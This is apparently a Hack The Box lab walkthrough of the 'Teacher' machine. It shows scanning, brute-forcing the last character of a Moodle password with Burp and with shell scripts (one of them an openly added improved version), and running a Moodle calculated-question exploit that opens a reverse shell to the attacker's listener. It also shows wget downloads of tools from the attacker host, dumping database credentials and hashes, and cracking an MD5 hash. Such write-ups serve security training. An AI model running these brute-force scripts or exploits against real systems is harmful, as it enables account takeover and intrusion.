Teacher
Port scan
u505@kali:~/HTB/Machines/Teacher$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.153 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-17 15:06:13 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.153
u505@kali:~/HTB/Machines/Teacher$ nmap -sC -sV 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 10:06 EST
Nmap scan report for teacher.htb (10.10.10.153)
Host is up (0.038s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
Web enumeration
u505@kali:~/HTB/Machines/Teacher$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,png,css,js" -r -f -t 50 -u http://10.10.10.153 --plain-text-report=dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: txt, png, css, js | HTTP method: get | Threads: 50 | Wordlist size: 23054 | Recursion level: 1

Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_10-16-55.log

Target: http://10.10.10.153

[10:16:55] Starting:
[10:16:55] 403 - 300B - /.htpasswd.css
[10:16:55] 403 - 299B - /.htpasswd.js
[10:16:59] 403 - 300B - /.htpasswd.png
[10:16:59] 403 - 300B - /.htpasswd.txt
[10:17:11] 200 - 931B - /css/
[10:17:19] 200 - 3KB - /fonts/
[10:17:23] 403 - 293B - /icons/
[10:17:23] 200 - 15KB - /images/
[10:17:26] 403 - 298B - /javascript/
[10:17:26] 200 - 1KB - /js/
[10:17:30] 200 - 626B - /manual/
[10:17:33] 200 - 26KB - /moodle/
[10:17:38] 403 - 298B - /phpmyadmin/
[10:17:48] 403 - 301B - /server-status/
[10:18:04] Starting: css/
[10:18:04] 403 - 304B - /css/.htpasswd.css
[10:18:04] 403 - 303B - /css/.htpasswd.js
[10:18:04] 403 - 304B - /css/.htpasswd.png
[10:18:04] 403 - 304B - /css/.htpasswd.txt
[10:18:48] 200 - 34KB - /css/style.css
[10:18:57] Starting: fonts/
[10:18:57] 403 - 306B - /fonts/.htpasswd.png
[10:18:57] 403 - 306B - /fonts/.htpasswd.txt
[10:18:57] 403 - 306B - /fonts/.htpasswd.css
[10:18:57] 403 - 305B - /fonts/.htpasswd.js
[10:19:49] Starting: icons/
[10:19:50] 403 - 306B - /icons/.htpasswd.css
[10:19:50] 403 - 305B - /icons/.htpasswd.js
[10:19:50] 403 - 306B - /icons/.htpasswd.png
[10:19:50] 403 - 306B - /icons/.htpasswd.txt
[10:19:54] 200 - 306B - /icons/a.png
[10:19:59] 200 - 308B - /icons/back.png
[10:20:00] 200 - 310B - /icons/binary.png
[10:20:01] 200 - 215B - /icons/blank.png
[10:20:01] 200 - 320B - /icons/broken.png
[10:20:02] 200 - 299B - /icons/c.png
[10:20:06] 200 - 1KB - /icons/compressed.png
[10:20:09] 200 - 295B - /icons/dir.png
[10:20:10] 200 - 256B - /icons/down.png
[10:20:13] 200 - 296B - /icons/f.png
[10:20:14] 200 - 295B - /icons/folder.png
[10:20:15] 200 - 308B - /icons/forward.png
[10:20:16] 200 - 275B - /icons/generic.png
[10:20:18] 200 - 332B - /icons/index.png
[10:20:21] 200 - 323B - /icons/layout.png
[10:20:21] 200 - 257B - /icons/left.png
[10:20:21] 200 - 314B - /icons/link.png
[10:20:24] 200 - 272B - /icons/movie.png
[10:20:27] 200 - 298B - /icons/p.png
[10:20:27] 200 - 310B - /icons/patch.png
[10:20:27] 200 - 304B - /icons/pdf.png
[10:20:28] 200 - 319B - /icons/portal.png
[10:20:30] 200 - 303B - /icons/ps.png
[10:20:32] 200 - 254B - /icons/right.png
[10:20:32] 200 - 290B - /icons/script.png
[10:20:34] 403 - 299B - /icons/small/
[10:20:37] 200 - 261B - /icons/tar.png
[10:20:38] 200 - 288B - /icons/text.png
[10:20:39] 200 - 334B - /icons/transfer.png
[10:20:41] 200 - 255B - /icons/up.png
[10:20:45] 200 - 1KB - /icons/xml.png
[10:20:46] Starting: images/
[10:20:46] 403 - 307B - /images/.htpasswd.txt
[10:20:46] 403 - 307B - /images/.htpasswd.png
[10:20:47] 403 - 307B - /images/.htpasswd.css
[10:20:47] 403 - 306B - /images/.htpasswd.js
[10:20:48] 200 - 5KB - /images/1.png
[10:20:48] 200 - 7KB - /images/2.png
[10:20:48] 200 - 9KB - /images/3.png
[10:20:48] 200 - 5KB - /images/4.png
[10:20:49] 200 - 200B - /images/5.png
[10:21:16] 200 - 4KB - /images/logo.png
[10:21:43] Starting: javascript/
[10:21:43] 403 - 311B - /javascript/.htpasswd.txt
[10:21:44] 403 - 310B - /javascript/.htpasswd.js
[10:21:44] 403 - 311B - /javascript/.htpasswd.png
[10:21:44] 403 - 311B - /javascript/.htpasswd.css
[10:22:09] 403 - 305B - /javascript/jquery/
[10:22:37] Starting: js/
[10:22:38] 403 - 303B - /js/.htpasswd.txt
[10:22:38] 403 - 303B - /js/.htpasswd.png
[10:22:38] 403 - 302B - /js/.htpasswd.js
[10:22:38] 403 - 303B - /js/.htpasswd.css
[10:23:16] 200 - 3KB - /js/main.js
[10:23:25] 200 - 44KB - /js/plugins.js
[10:23:46] Starting: manual/
[10:23:47] 403 - 306B - /manual/.htpasswd.js
[10:23:47] 403 - 307B - /manual/.htpasswd.png
[10:23:47] 403 - 307B - /manual/.htpasswd.css
[10:23:47] 403 - 307B - /manual/.htpasswd.txt
[10:24:05] 200 - 9KB - /manual/da/
[10:24:06] 200 - 9KB - /manual/de/
[10:24:10] 200 - 9KB - /manual/en/
[10:24:11] 200 - 10KB - /manual/es/
[10:24:14] 200 - 9KB - /manual/fr/
[10:24:18] 200 - 10KB - /manual/images/
[10:24:21] 200 - 10KB - /manual/ja/
[10:24:22] 200 - 8KB - /manual/ko/
[10:24:43] 200 - 3KB - /manual/style/
[10:24:45] 200 - 9KB - /manual/tr/
[10:24:48] 200 - 9KB - /manual/zh-cn/
[10:24:48] Starting: moodle/
[10:24:49] 403 - 307B - /moodle/.htpasswd.png
[10:24:49] 403 - 307B - /moodle/.htpasswd.css
[10:24:49] 403 - 306B - /moodle/.htpasswd.js
[10:24:49] 403 - 307B - /moodle/.htpasswd.txt
[10:24:51] 200 - 1KB - /moodle/analytics/
[10:24:51] 303 - 448B - /moodle/admin/
[10:24:52] 200 - 0B - /moodle/auth/
[10:24:52] 200 - 4KB - /moodle/backup/
[10:24:53] 200 - 1B - /moodle/blocks/
[10:24:53] 200 - 3KB - /moodle/cache/
[10:24:53] 303 - 440B - /moodle/blog/
[10:24:54] 303 - 442B - /moodle/calendar/
[10:24:56] 303 - 440B - /moodle/comment/
[10:24:59] 200 - 27KB - /moodle/course/
[10:25:07] 303 - 440B - /moodle/files/
[10:25:07] 200 - 1B - /moodle/filter/
[10:25:14] 200 - 26KB - /moodle/index.php/
[10:25:15] 200 - 2KB - /moodle/install/
[10:25:17] 200 - 1KB - /moodle/lang/
[10:25:18] 200 - 1B - /moodle/lib/
[10:25:19] 200 - 1KB - /moodle/local/
[10:25:20] 200 - 27KB - /moodle/login/
[10:25:22] 200 - 1KB - /moodle/media/
[10:25:22] 303 - 440B - /moodle/message/
[10:25:23] 200 - 0B - /moodle/mod/
[10:25:24] 303 - 440B - /moodle/my/
[10:25:25] 303 - 440B - /moodle/notes/
[10:25:30] 200 - 7KB - /moodle/pix/
[10:25:31] 200 - 2KB - /moodle/portfolio/
[10:25:34] 200 - 6KB - /moodle/question/
[10:25:34] 200 - 1KB - /moodle/README.txt
[10:25:35] 200 - 4KB - /moodle/report/
[10:25:35] 200 - 7KB - /moodle/repository/
[10:25:36] 200 - 1KB - /moodle/rss/
[10:25:36] 200 - 26KB - /moodle/search/
[10:25:42] 303 - 440B - /moodle/tag/
[10:25:43] 303 - 440B - /moodle/theme/
[10:25:48] 200 - 3KB - /moodle/webservice/
[10:25:51] Starting: phpmyadmin/
[10:27:11] Starting: server-status/

Task Completed
The interesting directory is /moodle/. Moodle is a free and open-source learning management system (LMS) written in PHP and distributed under the GNU General Public License. Developed on pedagogical principles, Moodle is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors.
With customizable management features, it is used to create private websites with online courses for educators and trainers to achieve learning goals. Moodle (an acronym for modular object-oriented dynamic learning environment) allows for extending and tailoring learning environments using community-sourced plugins.
Page gallery.html
If we take a look at the source of the page:
u505@kali:~/HTB/Machines/Teacher$ curl http://teacher.htb/gallery.html
<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
<head>
<meta charset="utf-8">
<title>Blackhat Highschool</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
<link rel="stylesheet" media="all" href="css/style.css">
<!--[if lt IE 9]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
...
<li>
<div class="slide">
<ul>
<li><a href="#"><img src="images/5.png" onerror="console.log('That\'s an F');" alt=""></a></li>
<li><a href="#"><img src="images/5_2.png" alt=""></a></li>
<li><a href="#"><img src="images/5_3.png" alt=""></a></li>
<li><a href="#"><img src="images/5_4.png" alt=""></a></li>
<li><a href="#"><img src="images/5_5.png" alt=""></a></li>
...
The image images/5.png is not rendered, and its onerror handler logs "That's an F". The file is in fact plain text:
u505@kali:~/HTB/Machines/Teacher$ wget -q http://teacher.htb/images/5.png
u505@kali:~/HTB/Machines/Teacher$ file 5.png
5.png: ASCII text
u505@kali:~/HTB/Machines/Teacher$ cat 5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks, Giovanni
So we have a username (giovanni) and all but the last character of the password.
Find the Moodle password with Burp
We need a list of candidate characters for the last position of the password: letters, digits and the special characters from SecLists.
u505@kali:~/HTB/Machines/Teacher$ cat generatelist.sh
#!/bin/bash
# one candidate per line: a-z, A-Z, 0-9
for car in {{a..z},{A..Z},{0..9}}
do
    echo $car
done
u505@kali:~/HTB/Machines/Teacher$ chmod +x generatelist.sh
u505@kali:~/HTB/Machines/Teacher$ ./generatelist.sh > list
u505@kali:~/HTB/Machines/Teacher$ cat /usr/share/seclists/Fuzzing/special-chars.txt >> list
We start Burp Suite and intercept the login POST request to /moodle/login/index.php.
We send the request to the Intruder module.
In Intruder we clear all payload positions, add a single position on the last character of the password, and remove the Cookie header (Moodle then starts a fresh session for every request).
On the Payloads tab we load our list of characters and start the attack.
During the attack the response length is identical for every payload except #, so the password is Th4C00lTheacha#.
Find the Moodle password without Burp
Another way is to write our own script that tests each candidate password from the command line.
u505@kali:~/HTB/Machines/Teacher$ vi testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ cat testlogin.sh
NUM=1
cat list | while read car
do
    USER=giovanni
    PASS=Th4C00lTheacha${car}
    POSTVAL="anchor=&username=${USER}&password=${PASS}"
    LENPSTVAL=${#POSTVAL}
    echo "Testing $USER $PASS" > result/test${NUM}.out
    printf "Testing $USER $PASS"
    # GET the login page first to obtain a fresh MoodleSession cookie for this attempt
    MoodleSession=`curl -i -s -k -X 'GET' -H 'Host: 10.10.10.153' \
        -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' \
        -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
        -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Connection: close' \
        -H 'Upgrade-Insecure-Requests: 1' 'http://10.10.10.153/moodle/login/index.php' \
        | grep "Set-Cookie: MoodleSession" | cut -d '=' -f 2 | cut -d ';' -f 1`
    # POST the credentials with that session and keep the whole response
    curl -i -s -k -X 'POST' -H 'Host: 10.10.10.153' \
        -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' \
        -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
        -H 'Accept-Language: en-US,en;q=0.5' -H 'Referer: http://10.10.10.153/moodle/login/index.php' \
        -H 'Content-Type: application/x-www-form-urlencoded' -H "Content-Length: ${LENPSTVAL}" \
        -H 'DNT: 1' -H 'Connection: close' -H "Cookie: MoodleSession=${MoodleSession}" \
        -H 'Upgrade-Insecure-Requests: 1' -b "MoodleSession=${MoodleSession}" \
        --data-binary "${POSTVAL}" 'http://10.10.10.153/moodle/login/index.php' >> result/test${NUM}.out
    # the size of the saved response tells a failed login apart from a successful one
    printf " --- file name: test${NUM}.out -- file lenth: `ls -l result/test${NUM}.out | awk '{print $5}'` \n"
    NUM=`expr $NUM + 1 `
done
u505@kali:~/HTB/Machines/Teacher$ chmod +x testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ mkdir result
u505@kali:~/HTB/Machines/Teacher$ ./testlogin.sh
Testing giovanni Th4C00lTheachaa --- file name: test1.out -- file lenth: 834
Testing giovanni Th4C00lTheachab --- file name: test2.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha@ --- file name: test65.out -- file lenth: 834
Testing giovanni Th4C00lTheacha# --- file name: test66.out -- file lenth: 1028
Testing giovanni Th4C00lTheacha$ --- file name: test67.out -- file lenth: 834
./testlogin.sh: line 13: printf: `%': missing format character
Testing giovanni Th4C00lTheacha --- file name: test68.out -- file lenth: 834
Testing giovanni Th4C00lTheacha^ --- file name: test69.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha< --- file name: test92.out -- file lenth: 834
Testing giovanni Th4C00lTheacha> --- file name: test93.out -- file lenth: 834
The saved response is larger only for the password Th4C00lTheacha#. The script fails for the character % because printf "Testing $USER $PASS" places the candidate inside the format string, where % starts a conversion specification; printf '%s' "Testing $USER $PASS" would avoid that. Candidates such as & and + would also need URL-encoding in the POST body (curl's --data-urlencode) to be tested correctly, since they are sent raw by --data-binary.
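The same last-character search, written as an added example rather than as code from the write-up: every attempt gets its own session, the POST body is URL-encoded so that #, %, & and + are tested correctly, the candidate never reaches printf as a format string, and the successful attempt is picked out as the one whose response length differs from the majority. The target URL, the login form fields and the known prefix are assumed from the write-up; the hidden logintoken field is sent only if the login page contains one.

```shell
#!/bin/sh
# Added example, not part of the original write-up: brute-force the last
# character of a password whose prefix is known, one fresh Moodle session per
# attempt, and report the attempt whose response length differs from the rest.
# Assumptions (from the write-up, not verified here): base URL, form fields
# anchor/username/password/logintoken, username giovanni, prefix Th4C00lTheacha.

TARGET="${TARGET:-http://10.10.10.153/moodle}"
USERNAME="giovanni"
PREFIX="Th4C00lTheacha"
# All printable ASCII except space, in one string so plain sh can walk it
# character by character; covers the letters, digits and special characters
# used in the write-up.
CHARSET='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'"'"'()*+,-./:;<=>?@[\]^_`{|}~'

# try_login USER PASS
# Prints the byte length of the final page returned for one login attempt.
# A fresh cookie jar per call gives every attempt its own MoodleSession, and
# --data-urlencode encodes '#', '%', '&' and '+' correctly in the POST body.
try_login() {
    jar=$(mktemp) || return 1
    # Newer Moodle versions add a hidden logintoken to the form; send it when
    # present, an empty value is harmless otherwise.
    token=$(curl -s -c "$jar" "$TARGET/login/index.php" \
        | sed -n 's/.*name="logintoken" value="\([^"]*\)".*/\1/p' | head -n 1)
    len=$(curl -s -L -b "$jar" -c "$jar" \
        --data-urlencode "anchor=" \
        --data-urlencode "logintoken=$token" \
        --data-urlencode "username=$1" \
        --data-urlencode "password=$2" \
        "$TARGET/login/index.php" | wc -c | tr -d ' ')
    rm -f "$jar"
    printf '%s\n' "$len"
}

# find_last_char USER PREFIX CHARSET
# Tries PREFIX followed by each character of CHARSET and prints the characters
# whose response length is not the most common one (the failed-login page).
find_last_char() {
    user=$1; prefix=$2; rest=$3
    results=""
    while [ -n "$rest" ]; do
        c=${rest%"${rest#?}"}   # first character of rest
        rest=${rest#?}          # drop it
        len=$(try_login "$user" "$prefix$c")
        # The candidate goes through '%s', so '%' can never be read as a format.
        results="$results$(printf '%s\t%s' "$len" "$c")
"
    done
    common=$(printf '%s' "$results" | cut -f1 | sort | uniq -c | sort -rn | head -n 1 | awk '{print $2}')
    printf '%s' "$results" | awk -F'\t' -v common="$common" '$1 != common { print $2 }'
}

# Usage against the live target:
# find_last_char "$USERNAME" "$PREFIX" "$CHARSET"
```

Comparing against the most common length rather than a fixed value (834 in the run above) keeps the script working when the failure page changes size, for instance after a Moodle upgrade or when a lockout notice is added to it.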
Moodle vulnerability
With giovanni's credentials we have access to the Moodle application as a teacher.
u505@kali:~/HTB/Machines/Teacher$ searchsploit moodle
---------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                  |  Path
                                                                | (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion        | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit)                  | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting                           | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure           | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Sc | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution               | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting                 | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting               | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution                            | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution                            | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting                    | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting          | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities                   | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting                    | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection                                  | exploits/php/webapps/41828.php
Moodle 3.4.1 - Remote Code Execution                            | exploits/php/webapps/46551.php
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metas | exploits/php/remote/46775.rb
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure              | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection               | exploits/php/webapps/28770.txt
Moodle Filepicker 3.5.2 - Server Side Request Forgery           | exploits/php/webapps/47177.txt
Moodle Help Script 1.x - Cross-Site Scripting                   | exploits/php/webapps/24279.txt
Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scrip | exploits/php/webapps/46881.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Teacher$ searchsploit -m 46551
  Exploit: Moodle 3.4.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46551
     Path: /usr/share/exploitdb/exploits/php/webapps/46551.php
File Type: C++ source, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Teacher/46551.php
To run this exploit we need a valid teacher username and password and the id of a course that teacher can edit.
Start a listener
u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Run the "evil teacher" exploit (CVE-2018-1133, code execution through a calculated question)
u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2
PHP Notice:  Undefined index: course in /opt/HTB/Machines/Teacher/46551.php on line 508

*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*

[!] Make sure you have a listener
[!] at 10.10.14.26:4444

[*] Logging in as user giovanni with password Th4C00lTheacha#
PHP Fatal error:  Uncaught Error: Call to undefined function exploit\curl_init() in /opt/HTB/Machines/Teacher/46551.php:417
Stack trace:
#0 /opt/HTB/Machines/Teacher/46551.php(105): exploit\moodle->httpPost('/login/index.ph...', Array)
#1 /opt/HTB/Machines/Teacher/46551.php(84): exploit\moodle->login('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#')
#2 /opt/HTB/Machines/Teacher/46551.php(511): exploit\moodle->__construct('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#', '10.10.14.26', '4444', NULL, false)
#3 {main}
  thrown in /opt/HTB/Machines/Teacher/46551.php on line 417
We check line 417 of the exploit:
u505@kali:~/HTB/Machines/Teacher$ vi +417 46551.php
$curl = curl_init(sprintf("%s%s", $this->url, $url));
The exploit uses the PHP curl extension, which is not installed on the attacking box.
u505@kali:~/HTB/Machines/Teacher$ sudo apt install php-curl
Then we run the exploit again:
u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2

*------------------------------*
* Noodle [Moodle RCE] (v3.4.1) *
*------------------------------*

[!] Make sure you have a listener
[!] at 10.10.14.26:4444

[*] Logging in as user giovanni with password Th4C00lTheacha#
[+] Successful Login
[>] Moodle Session 94i0d563nrguesgdhddnbt02n6
[>] Moodle Key ekQgRg8Bfc
[*] Loading Course ID 2
[+] Successfully Loaded Course
[*] Enable Editing
[+] Successfully Enabled Course Editing
[*] Adding Quiz
[+] Successfully Added Quiz
[*] Configuring New Quiz
[+] Successfully Configured Quiz
[*] Loading Edit Quiz Page
[+] Successfully Loaded Edit Quiz Page
[*] Adding Calculated Question
[+] Successfully Added Calculation Question
[*] Adding Evil Question
[+] Successfully Created Evil Question
[*] Sending Exploit

[>] You should receive a reverse shell attempt from the target at 10.10.14.26 on port 4444
[>] If connection was successful this program will wait here until you close the connection.
[>] You should be able to Ctrl+C and retain the connection through netcat.
The listener receives a reverse shell as www-data, which we upgrade to a PTY (the usual sequence is to background nc with Ctrl-Z, run stty raw -echo on the attacking terminal and bring nc back with fg; below it was typed directly in the remote shell):
u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.153.
Ncat: Connection from 10.10.10.153:36368.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@teacher:/var/www/html/moodle/question$ stty raw -echo
stty raw -echo
Local enumeration
As usual we upload tools to enumerate the local machine; a small web server on the attacking box serves them:
u505@kali:~/HTB/Machines/Teacher$ mkdir www
u505@kali:~/HTB/Machines/Teacher$ cd www/
u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/pspy/pspy64 ./
u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Teacher/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
From the target box:
www-data@teacher:/var/www/html/moodle/question$ cd /tmp/
www-data@teacher:/tmp$ wget -q http://10.10.14.26/pspy64
www-data@teacher:/tmp$ wget -q http://10.10.14.26/LinEnum.sh
www-data@teacher:/tmp$ chmod +x pspy64 LinEnum.sh
LinEnum.sh doesn't reveal anything useful, but the Moodle configuration file contains the database credentials:
www-data@teacher:/var/www/html/moodle$ cat config.php
...
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
...
In the moodle database we can read the mdl_user table:
www-data@teacher:/var/www/html/moodle$ mysql -p -u root
Enter password: Welkom1!
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 102
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [moodle]> select username,password from mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
Three of the hashes are bcrypt ($2y$, cost factor 10), which is slow to crack, but the Giovannibak account stores an unsalted MD5 hash, which a dictionary attack goes through very quickly.
Meanwhile pspy reveals a periodic task executed by root:
2020/02/17 20:11:01 CMD: UID=0 PID=1780 | /usr/sbin/CRON -f
2020/02/17 20:11:01 CMD: UID=0 PID=1781 | /usr/sbin/CRON -f
2020/02/17 20:11:01 CMD: UID=0 PID=1782 | /bin/sh -c /usr/bin/backup.sh
2020/02/17 20:11:01 CMD: UID=0 PID=1783 | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:11:01 CMD: UID=0 PID=1784 | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:11:01 CMD: UID=0 PID=1785 | gzip
2020/02/17 20:11:01 CMD: UID=0 PID=1786 | /bin/bash /usr/bin/backup.sh
2020/02/17 20:11:01 CMD: UID=0 PID=1787 | tar -xf backup_courses.tar.gz
2020/02/17 20:11:01 CMD: UID=0 PID=1788 | /bin/bash /usr/bin/backup.sh
www-data@teacher:/var/www/html/moodle$ cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
But as www-data we are not allowed into that directory:
www-data@teacher:/var/www/html/moodle$ cd /home/giovanni/work
bash: cd: /home/giovanni/work: Permission denied
Cracking the hash
u505@kali:~/HTB/Machines/Teacher$ vi hash.txt
u505@kali:~/HTB/Machines/Teacher$ cat hash.txt
7a860966115182402ed06375cf0a22af
u505@kali:~/HTB/Machines/Teacher$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 960M, 501/2004 MB allocatable, 5MCU

OpenCL Platform #2: The pocl project
====================================
* Device #2: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=500 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
* Device #1: Kernel m00000_a0-pure.408c2795.kernel not found in cache! Building may take a while...

Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

7a860966115182402ed06375cf0a22af:expelled

Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: 7a860966115182402ed06375cf0a22af
Time.Started.....: Mon Feb 17 14:04:13 2020 (0 secs)
Time.Estimated...: Mon Feb 17 14:04:13 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12721.4 kH/s (2.56ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 983040/14344384 (6.85%)
Rejected.........: 0/983040 (0.00%)
Restore.Point....: 655360/14344384 (4.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: grass4 -> computer?
Hardware.Mon.#1..: Temp: 43c Util: 17% Core:1137MHz Mem:2505MHz Bus:16

